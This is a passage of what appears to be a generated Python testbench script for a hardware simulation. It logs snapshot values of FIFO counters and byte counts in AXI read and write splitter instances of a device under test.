logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split13.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split13.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split13.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split13.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split14.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split14.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split14.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split14.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split15.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split15.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split15.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split15.axi_wr_4_splitter.b_fifo.count"))
